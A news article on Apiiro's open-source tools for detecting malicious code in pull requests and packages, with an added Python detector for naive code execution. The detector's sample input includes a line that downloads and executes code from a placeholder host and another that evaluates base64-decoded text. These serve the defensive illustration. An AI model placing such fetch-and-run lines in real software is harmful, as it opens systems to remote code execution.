Apiiro tools detect malicious code before they cause damage

Application security company Apiiro is releasing two open-source tools to help organizations defend against malicious code in their applications.

The release follows Apiiro's own security research, SD Times reports, which found thousands of instances of malicious code in repositories and packages.

According to the company, the research focused on in-depth code analysis and on identifying patterns in malicious code in order to develop defense strategies. Malicious code is one of the most accessible and easily executed attack vectors, the company says. Apiiro adds that the security of dependency managers and source code hosting platforms is still evolving.

That type of security has major gaps in its current implementation, according to Apiiro, such as in verification of human and digital identities, validation of source code and releases, and more. Apiiro also recognizes many security problems in build systems, artifact managers and pipeline tools.

Obfuscated and naive code

The research shows that attackers usually introduce malicious code via anti-patterns. Obfuscated code plays an important role here. A second anti-pattern is naive code execution, where code is received as data and executed immediately, without being scanned beforehand.

The new open-source tools detect the introduction of malicious code in most cases. The first tool is PRevent. This is an open-source application that scans pull requests, detects suspicious code and sends notifications. PRevent offers easy integration, high configurability and essential orchestration features.

The second tool is a set of malicious code detection rules designed to run on Semgrep. These rules are now available through Opengrep, a fork of Semgrep.
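As an added illustration (not Apiiro's code and not one of its Semgrep rules), the following Python script turns the two anti-patterns described above into a heuristic check over source text: it flags any `exec`, `eval` or `compile` call whose argument is built from a network fetch or a decoding step. The sink and source name lists and the sample input are constructed for this example.

```python
import ast
from typing import List, Optional, Tuple

# Sinks that turn a string into executed code.
EXEC_SINKS = {"exec", "eval", "compile"}
# Callee names treated as "data from outside" or as a de-obfuscation step
# (constructed list; matched on the last attribute, so requests.get and
# urllib.request.urlopen both match).
DATA_SOURCES = {"get", "post", "urlopen", "b64decode", "b32decode",
                "unhexlify", "decompress"}

def _callee(node: ast.Call) -> Optional[str]:
    """Bare callee name: foo(...) -> 'foo', a.b.foo(...) -> 'foo'."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None

def _source_inside(expr: ast.AST) -> Optional[str]:
    """First suspicious source call found anywhere inside an expression."""
    for sub in ast.walk(expr):
        if isinstance(sub, ast.Call) and _callee(sub) in DATA_SOURCES:
            return _callee(sub)
    return None

def find_naive_exec(source: str) -> List[Tuple[int, str, str]]:
    """(line, sink, source) for each exec/eval/compile call whose first
    argument is built from a network fetch or a decoding call."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and _callee(node) in EXEC_SINKS and node.args:
            if src := _source_inside(node.args[0]):
                hits.append((node.lineno, _callee(node), src))
    return hits

# Constructed sample: lines 3 and 4 should be flagged, line 5 should not.
SAMPLE = """
import base64, requests
exec(requests.get("https://example.invalid/payload").text)
eval(base64.b64decode("cHJpbnQoMSk=").decode())
exec("print('hello')")
"""

if __name__ == "__main__":
    for line, sink, src in find_naive_exec(SAMPLE):
        print(f"line {line}: {sink}() fed by {src}()")
```

The check is purely syntactic and will miss code that stores the fetched data in a variable before executing it; a Semgrep taint rule handles that case, which is why the rule set mentioned above is the more complete option.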

Code review

Apiiro advises that the best way to keep malicious code out of the codebase is a pre-merge hook: a process triggered on pull request events via webhooks and managed by strictly authorized entities. PRevent can initiate code reviews, or even block merges until a scan is approved or a reviewer gives permission.